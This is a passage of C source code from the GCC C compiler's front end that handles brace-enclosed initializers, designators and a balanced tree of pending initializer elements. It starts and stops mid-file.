require_constant_value = 0;
require_constant_elements = 0;
locus = _("(anonymous)");
}
constructor_stack = 0;
constructor_range_stack = 0;
found_missing_braces = 0;
spelling_base = 0;
spelling_size = 0;
RESTORE_SPELLING_DEPTH (0);
if (locus)
push_string (locus);
}
void
finish_init (void)
{
struct initializer_stack *p = initializer_stack;
/* Free the whole constructor stack of this initializer. */
while (constructor_stack)
{
struct constructor_stack *q = constructor_stack;
constructor_stack = q->next;
free (q);
}
gcc_assert (!constructor_range_stack);
/* Pop back to the data of the outer initializer (if any). */
free (spelling_base);
constructor_decl = p->decl;
require_constant_value = p->require_constant_value;
require_constant_elements = p->require_constant_elements;
constructor_stack = p->constructor_stack;
constructor_range_stack = p->constructor_range_stack;
constructor_elements = p->elements;
spelling = p->spelling;
spelling_base = p->spelling_base;
spelling_size = p->spelling_size;
constructor_top_level = p->top_level;
initializer_stack = p->next;
free (p);
}
/* Call here when we see the initializer is surrounded by braces.
This is instead of a call to push_init_level;
it is matched by a call to pop_init_level.
TYPE is the type to initialize, for a constructor expression.
For an initializer for a decl, TYPE is zero. */
void
really_start_incremental_init (tree type)
{
struct constructor_stack *p = XNEW (struct constructor_stack);
if (type == NULL_TREE)
type = TREE_TYPE (constructor_decl);
if (VECTOR_TYPE_P (type)
&& TYPE_VECTOR_OPAQUE (type))
error ("opaque vector types cannot be initialized");
p->type = constructor_type;
p->fields = constructor_fields;
p->index = constructor_index;
p->max_index = constructor_max_index;
p->unfilled_index = constructor_unfilled_index;
p->unfilled_fields = constructor_unfilled_fields;
p->bit_index = constructor_bit_index;
p->elements = constructor_elements;
p->constant = constructor_constant;
p->simple = constructor_simple;
p->nonconst = constructor_nonconst;
p->erroneous = constructor_erroneous;
p->pending_elts = constructor_pending_elts;
p->depth = constructor_depth;
p->replacement_value.value = 0;
p->replacement_value.original_code = ERROR_MARK;
p->replacement_value.original_type = NULL;
p->implicit = 0;
p->range_stack = 0;
p->outer = 0;
p->incremental = constructor_incremental;
p->designated = constructor_designated;
p->designator_depth = designator_depth;
p->next = 0;
constructor_stack = p;
constructor_constant = 1;
constructor_simple = 1;
constructor_nonconst = 0;
constructor_depth = SPELLING_DEPTH ();
constructor_elements = NULL;
constructor_pending_elts = 0;
constructor_type = type;
constructor_incremental = 1;
constructor_designated = 0;
constructor_zeroinit = 1;
designator_depth = 0;
designator_erroneous = 0;
if (RECORD_OR_UNION_TYPE_P (constructor_type))
{
constructor_fields = TYPE_FIELDS (constructor_type);
/* Skip any nameless bit fields at the beginning. */
while (constructor_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_fields))
constructor_fields = DECL_CHAIN (constructor_fields);
constructor_unfilled_fields = constructor_fields;
constructor_bit_index = bitsize_zero_node;
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (TYPE_DOMAIN (constructor_type))
{
constructor_max_index
= TYPE_MAX_VALUE (TYPE_DOMAIN (constructor_type));
/* Detect non-empty initializations of zero-length arrays. */
if (constructor_max_index == NULL_TREE
&& TYPE_SIZE (constructor_type))
constructor_max_index = integer_minus_one_node;
/* constructor_max_index needs to be an INTEGER_CST. Attempts
to initialize VLAs will cause a proper error; avoid tree
checking errors as well by setting a safe value. */
if (constructor_max_index
&& TREE_CODE (constructor_max_index) != INTEGER_CST)
constructor_max_index = integer_minus_one_node;
constructor_index
= convert (bitsizetype,
TYPE_MIN_VALUE (TYPE_DOMAIN (constructor_type)));
}
else
{
constructor_index = bitsize_zero_node;
constructor_max_index = NULL_TREE;
}
constructor_unfilled_index = constructor_index;
}
else if (gnu_vector_type_p (constructor_type))
{
/* Vectors are like simple fixed-size arrays. */
constructor_max_index =
bitsize_int (TYPE_VECTOR_SUBPARTS (constructor_type) - 1);
constructor_index = bitsize_zero_node;
constructor_unfilled_index = constructor_index;
}
else
{
/* Handle the case of int x = {5}; */
constructor_fields = constructor_type;
constructor_unfilled_fields = constructor_type;
}
}
extern location_t last_init_list_comma;
/* Called when we see an open brace for a nested initializer. Finish
off any pending levels with implicit braces. */
void
finish_implicit_inits (location_t loc, struct obstack *braced_init_obstack)
{
while (constructor_stack->implicit)
{
if (RECORD_OR_UNION_TYPE_P (constructor_type)
&& constructor_fields == NULL_TREE)
process_init_element (input_location,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
else if (TREE_CODE (constructor_type) == ARRAY_TYPE
&& constructor_max_index
&& tree_int_cst_lt (constructor_max_index,
constructor_index))
process_init_element (input_location,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
else
break;
}
}
/* Push down into a subobject, for initialization.
If this is for an explicit set of braces, IMPLICIT is 0.
If it is because the next element belongs at a lower level,
IMPLICIT is 1 (or 2 if the push is because of designator list). */
void
push_init_level (location_t loc, int implicit,
struct obstack *braced_init_obstack)
{
struct constructor_stack *p;
tree value = NULL_TREE;
/* Unless this is an explicit brace, we need to preserve previous
content if any. */
if (implicit)
{
if (RECORD_OR_UNION_TYPE_P (constructor_type) && constructor_fields)
value = find_init_member (constructor_fields, braced_init_obstack);
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
value = find_init_member (constructor_index, braced_init_obstack);
}
p = XNEW (struct constructor_stack);
p->type = constructor_type;
p->fields = constructor_fields;
p->index = constructor_index;
p->max_index = constructor_max_index;
p->unfilled_index = constructor_unfilled_index;
p->unfilled_fields = constructor_unfilled_fields;
p->bit_index = constructor_bit_index;
p->elements = constructor_elements;
p->constant = constructor_constant;
p->simple = constructor_simple;
p->nonconst = constructor_nonconst;
p->erroneous = constructor_erroneous;
p->pending_elts = constructor_pending_elts;
p->depth = constructor_depth;
p->replacement_value.value = NULL_TREE;
p->replacement_value.original_code = ERROR_MARK;
p->replacement_value.original_type = NULL;
p->implicit = implicit;
p->outer = 0;
p->incremental = constructor_incremental;
p->designated = constructor_designated;
p->designator_depth = designator_depth;
p->next = constructor_stack;
p->range_stack = 0;
constructor_stack = p;
constructor_constant = 1;
constructor_simple = 1;
constructor_nonconst = 0;
constructor_depth = SPELLING_DEPTH ();
constructor_elements = NULL;
constructor_incremental = 1;
constructor_designated = 0;
constructor_pending_elts = 0;
if (!implicit)
{
p->range_stack = constructor_range_stack;
constructor_range_stack = 0;
designator_depth = 0;
designator_erroneous = 0;
}
/* Don't die if an entire brace-pair level is superfluous
in the containing level. */
if (constructor_type == NULL_TREE)
;
else if (RECORD_OR_UNION_TYPE_P (constructor_type))
{
/* Don't die if there are extra init elts at the end. */
if (constructor_fields == NULL_TREE)
constructor_type = NULL_TREE;
else
{
constructor_type = TREE_TYPE (constructor_fields);
push_member_name (constructor_fields);
constructor_depth++;
}
/* If upper initializer is designated, then mark this as
designated too to prevent bogus warnings. */
constructor_designated = p->designated;
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
constructor_type = TREE_TYPE (constructor_type);
push_array_bounds (tree_to_uhwi (constructor_index));
constructor_depth++;
}
if (constructor_type == NULL_TREE)
{
error_init (loc, "extra brace group at end of initializer");
constructor_fields = NULL_TREE;
constructor_unfilled_fields = NULL_TREE;
return;
}
if (value && TREE_CODE (value) == CONSTRUCTOR)
{
constructor_constant = TREE_CONSTANT (value);
constructor_simple = TREE_STATIC (value);
constructor_nonconst = CONSTRUCTOR_NON_CONST (value);
constructor_elements = CONSTRUCTOR_ELTS (value);
if (!vec_safe_is_empty (constructor_elements)
&& (TREE_CODE (constructor_type) == RECORD_TYPE
|| TREE_CODE (constructor_type) == ARRAY_TYPE))
set_nonincremental_init (braced_init_obstack);
}
if (implicit == 1)
{
found_missing_braces = 1;
if (initializer_stack->missing_brace_richloc)
initializer_stack->missing_brace_richloc->add_fixit_insert_before
(loc, "{");
}
if (RECORD_OR_UNION_TYPE_P (constructor_type))
{
constructor_fields = TYPE_FIELDS (constructor_type);
/* Skip any nameless bit fields at the beginning. */
while (constructor_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_fields))
constructor_fields = DECL_CHAIN (constructor_fields);
constructor_unfilled_fields = constructor_fields;
constructor_bit_index = bitsize_zero_node;
}
else if (gnu_vector_type_p (constructor_type))
{
/* Vectors are like simple fixed-size arrays. */
constructor_max_index =
bitsize_int (TYPE_VECTOR_SUBPARTS (constructor_type) - 1);
constructor_index = bitsize_int (0);
constructor_unfilled_index = constructor_index;
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (TYPE_DOMAIN (constructor_type))
{
constructor_max_index
= TYPE_MAX_VALUE (TYPE_DOMAIN (constructor_type));
/* Detect non-empty initializations of zero-length arrays. */
if (constructor_max_index == NULL_TREE
&& TYPE_SIZE (constructor_type))
constructor_max_index = integer_minus_one_node;
/* constructor_max_index needs to be an INTEGER_CST. Attempts
to initialize VLAs will cause a proper error; avoid tree
checking errors as well by setting a safe value. */
if (constructor_max_index
&& TREE_CODE (constructor_max_index) != INTEGER_CST)
constructor_max_index = integer_minus_one_node;
constructor_index
= convert (bitsizetype,
TYPE_MIN_VALUE (TYPE_DOMAIN (constructor_type)));
}
else
constructor_index = bitsize_zero_node;
constructor_unfilled_index = constructor_index;
if (value && TREE_CODE (value) == STRING_CST)
{
/* We need to split the char/wchar array into individual
characters, so that we don't have to special case it
everywhere. */
set_nonincremental_init_from_string (value, braced_init_obstack);
}
}
else
{
if (constructor_type != error_mark_node)
warning_init (input_location, 0, "braces around scalar initializer");
constructor_fields = constructor_type;
constructor_unfilled_fields = constructor_type;
}
}
/* At the end of an implicit or explicit brace level,
finish up that level of constructor. If a single expression
with redundant braces initialized that level, return the
c_expr structure for that expression. Otherwise, the original_code
element is set to ERROR_MARK.
If we were outputting the elements as they are read, return 0 as the value
from inner levels (process_init_element ignores that),
but return error_mark_node as the value from the outermost level
(that's what we want to put in DECL_INITIAL).
Otherwise, return a CONSTRUCTOR expression as the value. */
struct c_expr
pop_init_level (location_t loc, int implicit,
struct obstack *braced_init_obstack,
location_t insert_before)
{
struct constructor_stack *p;
struct c_expr ret;
ret.value = NULL_TREE;
ret.original_code = ERROR_MARK;
ret.original_type = NULL;
if (implicit == 0)
{
/* When we come to an explicit close brace,
pop any inner levels that didn't have explicit braces. */
while (constructor_stack->implicit)
process_init_element (input_location,
pop_init_level (loc, 1, braced_init_obstack,
insert_before),
true, braced_init_obstack);
gcc_assert (!constructor_range_stack);
}
else
if (initializer_stack->missing_brace_richloc)
initializer_stack->missing_brace_richloc->add_fixit_insert_before
(insert_before, "}");
/* Now output all pending elements. */
constructor_incremental = 1;
output_pending_init_elements (1, braced_init_obstack);
p = constructor_stack;
/* Error for initializing a flexible array member, or a zero-length
array member in an inappropriate context. */
if (constructor_type && constructor_fields
&& TREE_CODE (constructor_type) == ARRAY_TYPE
&& TYPE_DOMAIN (constructor_type)
&& !TYPE_MAX_VALUE (TYPE_DOMAIN (constructor_type)))
{
/* Silently discard empty initializations. The parser will
already have pedwarned for empty brackets. */
if (integer_zerop (constructor_unfilled_index))
constructor_type = NULL_TREE;
else
{
gcc_assert (!TYPE_SIZE (constructor_type));
if (constructor_depth > 2)
error_init (loc, "initialization of flexible array member in a nested context");
else
pedwarn_init (loc, OPT_Wpedantic,
"initialization of a flexible array member");
/* We have already issued an error message for the existence
of a flexible array member not at the end of the structure.
Discard the initializer so that we do not die later. */
if (DECL_CHAIN (constructor_fields) != NULL_TREE)
constructor_type = NULL_TREE;
}
}
switch (vec_safe_length (constructor_elements))
{
case 0:
/* Initialization with { } counts as zeroinit. */
constructor_zeroinit = 1;
break;
case 1:
/* This might be zeroinit as well. */
if (integer_zerop ((*constructor_elements)[0].value))
constructor_zeroinit = 1;
break;
default:
/* If the constructor has more than one element, it can't be { 0 }. */
constructor_zeroinit = 0;
break;
}
/* Warn when some structs are initialized with direct aggregation. */
if (!implicit && found_missing_braces && warn_missing_braces
&& !constructor_zeroinit)
{
gcc_assert (initializer_stack->missing_brace_richloc);
warning_at (initializer_stack->missing_brace_richloc,
OPT_Wmissing_braces,
"missing braces around initializer");
}
/* Warn when some struct elements are implicitly initialized to zero. */
if (warn_missing_field_initializers
&& constructor_type
&& TREE_CODE (constructor_type) == RECORD_TYPE
&& constructor_unfilled_fields)
{
/* Do not warn for flexible array members or zero-length arrays. */
while (constructor_unfilled_fields
&& (!DECL_SIZE (constructor_unfilled_fields)
|| integer_zerop (DECL_SIZE (constructor_unfilled_fields))))
constructor_unfilled_fields = DECL_CHAIN (constructor_unfilled_fields);
if (constructor_unfilled_fields
/* Do not warn if this level of the initializer uses member
designators; it is likely to be deliberate. */
&& !constructor_designated
/* Do not warn about initializing with { 0 } or with { }. */
&& !constructor_zeroinit)
{
if (warning_at (input_location, OPT_Wmissing_field_initializers,
"missing initializer for field %qD of %qT",
constructor_unfilled_fields,
constructor_type))
inform (DECL_SOURCE_LOCATION (constructor_unfilled_fields),
"%qD declared here", constructor_unfilled_fields);
}
}
/* Pad out the end of the structure. */
if (p->replacement_value.value)
/* If this closes a superfluous brace pair,
just pass out the element between them. */
ret = p->replacement_value;
else if (constructor_type == NULL_TREE)
;
else if (!RECORD_OR_UNION_TYPE_P (constructor_type)
&& TREE_CODE (constructor_type) != ARRAY_TYPE
&& !gnu_vector_type_p (constructor_type))
{
/* A nonincremental scalar initializer--just return
the element, after verifying there is just one. */
if (vec_safe_is_empty (constructor_elements))
{
if (!constructor_erroneous && constructor_type != error_mark_node)
error_init (loc, "empty scalar initializer");
ret.value = error_mark_node;
}
else if (vec_safe_length (constructor_elements) != 1)
{
error_init (loc, "extra elements in scalar initializer");
ret.value = (*constructor_elements)[0].value;
}
else
ret.value = (*constructor_elements)[0].value;
}
else
{
if (constructor_erroneous)
ret.value = error_mark_node;
else
{
ret.value = build_constructor (constructor_type,
constructor_elements);
if (constructor_constant)
TREE_CONSTANT (ret.value) = 1;
if (constructor_constant && constructor_simple)
TREE_STATIC (ret.value) = 1;
if (constructor_nonconst)
CONSTRUCTOR_NON_CONST (ret.value) = 1;
}
}
if (ret.value && TREE_CODE (ret.value) != CONSTRUCTOR)
{
if (constructor_nonconst)
ret.original_code = C_MAYBE_CONST_EXPR;
else if (ret.original_code == C_MAYBE_CONST_EXPR)
ret.original_code = ERROR_MARK;
}
constructor_type = p->type;
constructor_fields = p->fields;
constructor_index = p->index;
constructor_max_index = p->max_index;
constructor_unfilled_index = p->unfilled_index;
constructor_unfilled_fields = p->unfilled_fields;
constructor_bit_index = p->bit_index;
constructor_elements = p->elements;
constructor_constant = p->constant;
constructor_simple = p->simple;
constructor_nonconst = p->nonconst;
constructor_erroneous = p->erroneous;
constructor_incremental = p->incremental;
constructor_designated = p->designated;
designator_depth = p->designator_depth;
constructor_pending_elts = p->pending_elts;
constructor_depth = p->depth;
if (!p->implicit)
constructor_range_stack = p->range_stack;
RESTORE_SPELLING_DEPTH (constructor_depth);
constructor_stack = p->next;
free (p);
if (ret.value == NULL_TREE && constructor_stack == 0)
ret.value = error_mark_node;
return ret;
}
/* Common handling for both array range and field name designators.
ARRAY argument is nonzero for array ranges. Returns false for success. */
static bool
set_designator (location_t loc, bool array,
struct obstack *braced_init_obstack)
{
tree subtype;
enum tree_code subcode;
/* Don't die if an entire brace-pair level is superfluous
in the containing level, or for an erroneous type. */
if (constructor_type == NULL_TREE || constructor_type == error_mark_node)
return true;
/* If there were errors in this designator list already, bail out
silently. */
if (designator_erroneous)
return true;
/* Likewise for an initializer for a variable-size type. Those are
diagnosed in digest_init. */
if (COMPLETE_TYPE_P (constructor_type)
&& TREE_CODE (TYPE_SIZE (constructor_type)) != INTEGER_CST)
return true;
if (!designator_depth)
{
gcc_assert (!constructor_range_stack);
/* Designator list starts at the level of closest explicit
braces. */
while (constructor_stack->implicit)
process_init_element (input_location,
pop_init_level (loc, 1, braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
constructor_designated = 1;
return false;
}
switch (TREE_CODE (constructor_type))
{
case RECORD_TYPE:
case UNION_TYPE:
subtype = TREE_TYPE (constructor_fields);
if (subtype != error_mark_node)
subtype = TYPE_MAIN_VARIANT (subtype);
break;
case ARRAY_TYPE:
subtype = TYPE_MAIN_VARIANT (TREE_TYPE (constructor_type));
break;
default:
gcc_unreachable ();
}
subcode = TREE_CODE (subtype);
if (array && subcode != ARRAY_TYPE)
{
error_init (loc, "array index in non-array initializer");
return true;
}
else if (!array && subcode != RECORD_TYPE && subcode != UNION_TYPE)
{
error_init (loc, "field name not in record or union initializer");
return true;
}
constructor_designated = 1;
finish_implicit_inits (loc, braced_init_obstack);
push_init_level (loc, 2, braced_init_obstack);
return false;
}
/* If there are range designators in designator list, push a new designator
to constructor_range_stack. RANGE_END is end of such stack range or
NULL_TREE if there is no range designator at this level. */
static void
push_range_stack (tree range_end, struct obstack * braced_init_obstack)
{
struct constructor_range_stack *p;
p = (struct constructor_range_stack *)
obstack_alloc (braced_init_obstack,
sizeof (struct constructor_range_stack));
p->prev = constructor_range_stack;
p->next = 0;
p->fields = constructor_fields;
p->range_start = constructor_index;
p->index = constructor_index;
p->stack = constructor_stack;
p->range_end = range_end;
if (constructor_range_stack)
constructor_range_stack->next = p;
constructor_range_stack = p;
}
/* Within an array initializer, specify the next index to be initialized.
FIRST is that index. If LAST is nonzero, then initialize a range
of indices, running from FIRST through LAST. */
void
set_init_index (location_t loc, tree first, tree last,
struct obstack *braced_init_obstack)
{
if (set_designator (loc, true, braced_init_obstack))
return;
designator_erroneous = 1;
if (!INTEGRAL_TYPE_P (TREE_TYPE (first))
|| (last && !INTEGRAL_TYPE_P (TREE_TYPE (last))))
{
error_init (loc, "array index in initializer not of integer type");
return;
}
if (TREE_CODE (first) != INTEGER_CST)
{
first = c_fully_fold (first, false, NULL);
if (TREE_CODE (first) == INTEGER_CST)
pedwarn_init (loc, OPT_Wpedantic,
"array index in initializer is not "
"an integer constant expression");
}
if (last && TREE_CODE (last) != INTEGER_CST)
{
last = c_fully_fold (last, false, NULL);
if (TREE_CODE (last) == INTEGER_CST)
pedwarn_init (loc, OPT_Wpedantic,
"array index in initializer is not "
"an integer constant expression");
}
if (TREE_CODE (first) != INTEGER_CST)
error_init (loc, "nonconstant array index in initializer");
else if (last != NULL_TREE && TREE_CODE (last) != INTEGER_CST)
error_init (loc, "nonconstant array index in initializer");
else if (TREE_CODE (constructor_type) != ARRAY_TYPE)
error_init (loc, "array index in non-array initializer");
else if (tree_int_cst_sgn (first) == -1)
error_init (loc, "array index in initializer exceeds array bounds");
else if (constructor_max_index
&& tree_int_cst_lt (constructor_max_index, first))
error_init (loc, "array index in initializer exceeds array bounds");
else
{
constant_expression_warning (first);
if (last)
constant_expression_warning (last);
constructor_index = convert (bitsizetype, first);
if (tree_int_cst_lt (constructor_index, first))
{
constructor_index = copy_node (constructor_index);
TREE_OVERFLOW (constructor_index) = 1;
}
if (last)
{
if (tree_int_cst_equal (first, last))
last = NULL_TREE;
else if (tree_int_cst_lt (last, first))
{
error_init (loc, "empty index range in initializer");
last = NULL_TREE;
}
else
{
last = convert (bitsizetype, last);
if (constructor_max_index != NULL_TREE
&& tree_int_cst_lt (constructor_max_index, last))
{
error_init (loc, "array index range in initializer exceeds "
"array bounds");
last = NULL_TREE;
}
}
}
designator_depth++;
designator_erroneous = 0;
if (constructor_range_stack || last)
push_range_stack (last, braced_init_obstack);
}
}
/* Within a struct initializer, specify the next field to be initialized. */
void
set_init_label (location_t loc, tree fieldname, location_t fieldname_loc,
struct obstack *braced_init_obstack)
{
tree field;
if (set_designator (loc, false, braced_init_obstack))
return;
designator_erroneous = 1;
if (!RECORD_OR_UNION_TYPE_P (constructor_type))
{
error_init (loc, "field name not in record or union initializer");
return;
}
field = lookup_field (constructor_type, fieldname);
if (field == NULL_TREE)
{
tree guessed_id = lookup_field_fuzzy (constructor_type, fieldname);
if (guessed_id)
{
gcc_rich_location rich_loc (fieldname_loc);
rich_loc.add_fixit_misspelled_id (fieldname_loc, guessed_id);
error_at (&rich_loc,
"%qT has no member named %qE; did you mean %qE?",
constructor_type, fieldname, guessed_id);
}
else
error_at (fieldname_loc, "%qT has no member named %qE",
constructor_type, fieldname);
}
else
do
{
constructor_fields = TREE_VALUE (field);
designator_depth++;
designator_erroneous = 0;
if (constructor_range_stack)
push_range_stack (NULL_TREE, braced_init_obstack);
field = TREE_CHAIN (field);
if (field)
{
if (set_designator (loc, false, braced_init_obstack))
return;
}
}
while (field != NULL_TREE);
}
/* Add a new initializer to the tree of pending initializers. PURPOSE
identifies the initializer, either array index or field in a structure.
VALUE is the value of that index or field. If ORIGTYPE is not
NULL_TREE, it is the original type of VALUE.
IMPLICIT is true if value comes from pop_init_level (1),
the new initializer has been merged with the existing one
and thus no warnings should be emitted about overriding an
existing initializer. */
static void
add_pending_init (location_t loc, tree purpose, tree value, tree origtype,
bool implicit, struct obstack *braced_init_obstack)
{
struct init_node *p, **q, *r;
q = &constructor_pending_elts;
p = 0;
if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
while (*q != 0)
{
p = *q;
if (tree_int_cst_lt (purpose, p->purpose))
q = &p->left;
else if (tree_int_cst_lt (p->purpose, purpose))
q = &p->right;
else
{
if (!implicit)
{
if (TREE_SIDE_EFFECTS (p->value))
warning_init (loc, OPT_Woverride_init_side_effects,
"initialized field with side-effects "
"overwritten");
else if (warn_override_init)
warning_init (loc, OPT_Woverride_init,
"initialized field overwritten");
}
p->value = value;
p->origtype = origtype;
return;
}
}
}
else
{
tree bitpos;
bitpos = bit_position (purpose);
while (*q != NULL)
{
p = *q;
if (tree_int_cst_lt (bitpos, bit_position (p->purpose)))
q = &p->left;
else if (p->purpose != purpose)
q = &p->right;
else
{
if (!implicit)
{
if (TREE_SIDE_EFFECTS (p->value))
warning_init (loc, OPT_Woverride_init_side_effects,
"initialized field with side-effects "
"overwritten");
else if (warn_override_init)
warning_init (loc, OPT_Woverride_init,
"initialized field overwritten");
}
p->value = value;
p->origtype = origtype;
return;
}
}
}
r = (struct init_node *) obstack_alloc (braced_init_obstack,
sizeof (struct init_node));
r->purpose = purpose;
r->value = value;
r->origtype = origtype;
*q = r;
r->parent = p;
r->left = 0;
r->right = 0;
r->balance = 0;
while (p)
{
struct init_node *s;
if (r == p->left)
{
if (p->balance == 0)
p->balance = -1;
else if (p->balance < 0)
{
if (r->balance < 0)
{
/* L rotation. */
p->left = r->right;
if (p->left)
p->left->parent = p;
r->right = p;
p->balance = 0;
r->balance = 0;
s = p->parent;
p->parent = r;
r->parent = s;
if (s)
{
if (s->left == p)
s->left = r;
else
s->right = r;
}
else
constructor_pending_elts = r;
}
else
{
/* LR rotation. */
struct init_node *t = r->right;
r->right = t->left;
if (r->right)
r->right->parent = r;
t->left = r;
p->left = t->right;
if (p->left)
p->left->parent = p;
t->right = p;
p->balance = t->balance < 0;
r->balance = -(t->balance > 0);
t->balance = 0;
s = p->parent;
p->parent = t;
r->parent = t;
t->parent = s;
if (s)
{
if (s->left == p)
s->left = t;
else
s->right = t;
}
else
constructor_pending_elts = t;
}
break;
}
else
{
/* p->balance == +1; growth of left side balances the node. */
p->balance = 0;
break;
}
}
else /* r == p->right */
{
if (p->balance == 0)
/* Growth propagation from right side. */
p->balance++;
else if (p->balance > 0)
{
if (r->balance > 0)
{
/* R rotation. */
p->right = r->left;
if (p->right)
p->right->parent = p;
r->left = p;
p->balance = 0;
r->balance = 0;
s = p->parent;
p->parent = r;
r->parent = s;
if (s)
{
if (s->left == p)
s->left = r;
else
s->right = r;
}
else
constructor_pending_elts = r;
}
else /* r->balance == -1 */
{
/* RL rotation */
struct init_node *t = r->left;
r->left = t->right;
if (r->left)
r->left->parent = r;
t->right = r;
p->right = t->left;
if (p->right)
p->right->parent = p;
t->left = p;
r->balance = (t->balance < 0);
p->balance = -(t->balance > 0);
t->balance = 0;
s = p->parent;
p->parent = t;
r->parent = t;
t->parent = s;
if (s)
{
if (s->left == p)
s->left = t;
else
s->right = t;
}
else
constructor_pending_elts = t;
}
break;
}
else
{
/* p->balance == -1; growth of right side balances the node. */
p->balance = 0;
break;
}
}
r = p;
p = p->parent;
}
}
/* Build AVL tree from a sorted chain. */
static void
set_nonincremental_init (struct obstack * braced_init_obstack)
{
unsigned HOST_WIDE_INT ix;
tree index, value;
if (TREE_CODE (constructor_type) != RECORD_TYPE
&& TREE_CODE (constructor_type) != ARRAY_TYPE)
return;
FOR_EACH_CONSTRUCTOR_ELT (constructor_elements, ix, index, value)
add_pending_init (input_location, index, value, NULL_TREE, true,
braced_init_obstack);
constructor_elements = NULL;
if (TREE_CODE (constructor_type) == RECORD_TYPE)
{
constructor_unfilled_fields = TYPE_FIELDS (constructor_type);
/* Skip any nameless bit fields at the beginning. */
while (constructor_unfilled_fields != NULL_TREE
&& DECL_UNNAMED_BIT_FIELD (constructor_unfilled_fields))
constructor_unfilled_fields = TREE_CHAIN (constructor_unfilled_fields);
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (TYPE_DOMAIN (constructor_type))
constructor_unfilled_index
= convert (bitsizetype,
TYPE_MIN_VALUE (TYPE_DOMAIN (constructor_type)));
else
constructor_unfilled_index = bitsize_zero_node;
}
constructor_incremental = 0;
}
/* Build AVL tree from a string constant. */
static void
set_nonincremental_init_from_string (tree str,
struct obstack * braced_init_obstack)
{
tree value, purpose, type;
HOST_WIDE_INT val[2];
const char *p, *end;
int byte, wchar_bytes, charwidth, bitpos;
gcc_assert (TREE_CODE (constructor_type) == ARRAY_TYPE);
wchar_bytes = TYPE_PRECISION (TREE_TYPE (TREE_TYPE (str))) / BITS_PER_UNIT;
charwidth = TYPE_PRECISION (char_type_node);
gcc_assert ((size_t) wchar_bytes * charwidth
<= ARRAY_SIZE (val) * HOST_BITS_PER_WIDE_INT);
type = TREE_TYPE (constructor_type);
p = TREE_STRING_POINTER (str);
end = p + TREE_STRING_LENGTH (str);
for (purpose = bitsize_zero_node;
p < end
&& !(constructor_max_index
&& tree_int_cst_lt (constructor_max_index, purpose));
purpose = size_binop (PLUS_EXPR, purpose, bitsize_one_node))
{
if (wchar_bytes == 1)
{
val[0] = (unsigned char) *p++;
val[1] = 0;
}
else
{
val[1] = 0;
val[0] = 0;
for (byte = 0; byte < wchar_bytes; byte++)
{
if (BYTES_BIG_ENDIAN)
bitpos = (wchar_bytes - byte - 1) * charwidth;
else
bitpos = byte * charwidth;
val[bitpos / HOST_BITS_PER_WIDE_INT]
|= ((unsigned HOST_WIDE_INT) ((unsigned char) *p++))
<< (bitpos % HOST_BITS_PER_WIDE_INT);
}
}
if (!TYPE_UNSIGNED (type))
{
bitpos = ((wchar_bytes - 1) * charwidth) + HOST_BITS_PER_CHAR;
if (bitpos < HOST_BITS_PER_WIDE_INT)
{
if (val[0] & (HOST_WIDE_INT_1 << (bitpos - 1)))
{
val[0] |= HOST_WIDE_INT_M1U << bitpos;
val[1] = -1;
}
}
else if (bitpos == HOST_BITS_PER_WIDE_INT)
{
if (val[0] < 0)
val[1] = -1;
}
else if (val[1] & (HOST_WIDE_INT_1
<< (bitpos - 1 - HOST_BITS_PER_WIDE_INT)))
val[1] |= HOST_WIDE_INT_M1U << (bitpos - HOST_BITS_PER_WIDE_INT);
}
value = wide_int_to_tree (type,
wide_int::from_array (val, 2,
HOST_BITS_PER_WIDE_INT * 2));
add_pending_init (input_location, purpose, value, NULL_TREE, true,
braced_init_obstack);
}
constructor_incremental = 0;
}
/* Return value of FIELD in pending initializer or NULL_TREE if the field was
not initialized yet. */
static tree
find_init_member (tree field, struct obstack * braced_init_obstack)
{
struct init_node *p;
if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
if (constructor_incremental
&& tree_int_cst_lt (field, constructor_unfilled_index))
set_nonincremental_init (braced_init_obstack);
p = constructor_pending_elts;
while (p)
{
if (tree_int_cst_lt (field, p->purpose))
p = p->left;
else if (tree_int_cst_lt (p->purpose, field))
p = p->right;
else
return p->value;
}
}
else if (TREE_CODE (constructor_type) == RECORD_TYPE)
{
tree bitpos = bit_position (field);
if (constructor_incremental
&& (!constructor_unfilled_fields
|| tree_int_cst_lt (bitpos,
bit_position (constructor_unfilled_fields))))
set_nonincremental_init (braced_init_obstack);
p = constructor_pending_elts;
while (p)
{
if (field == p->purpose)
return p->value;
else if (tree_int_cst_lt (bitpos, bit_position (p->purpose)))
p = p->left;
else
p = p->right;
}
}
else if (TREE_CODE (constructor_type) == UNION_TYPE)
{
if (!vec_safe_is_empty (constructor_elements)
&& (constructor_elements->last ().index == field))
return constructor_elements->last ().value;
}
return NULL_TREE;
}
/* "Output" the next constructor element.
At top level, really output it to assembler code now.
Otherwise, collect it in a list from which we will make a CONSTRUCTOR.
If ORIGTYPE is not NULL_TREE, it is the original type of VALUE.
TYPE is the data type that the containing data type wants here.
FIELD is the field (a FIELD_DECL) or the index that this element fills.
If VALUE is a string constant, STRICT_STRING is true if it is
unparenthesized or we should not warn here for it being parenthesized.
For other types of VALUE, STRICT_STRING is not used.
PENDING if true means output pending elements that belong
right after this element. (PENDING is normally true;
it is false while outputting pending elements, to avoid recursion.)
IMPLICIT is true if value comes from pop_init_level (1),
the new initializer has been merged with the existing one
and thus no warnings should be emitted about overriding an
existing initializer. */
static void
output_init_element (location_t loc, tree value, tree origtype,
bool strict_string, tree type, tree field, bool pending,
bool implicit, struct obstack * braced_init_obstack)
{
tree semantic_type = NULL_TREE;
bool maybe_const = true;
bool npc;
if (type == error_mark_node || value == error_mark_node)
{
constructor_erroneous = 1;
return;
}
if (TREE_CODE (TREE_TYPE (value)) == ARRAY_TYPE
&& (TREE_CODE (value) == STRING_CST
|| TREE_CODE (value) == COMPOUND_LITERAL_EXPR)
&& !(TREE_CODE (value) == STRING_CST
&& TREE_CODE (type) == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (type)))
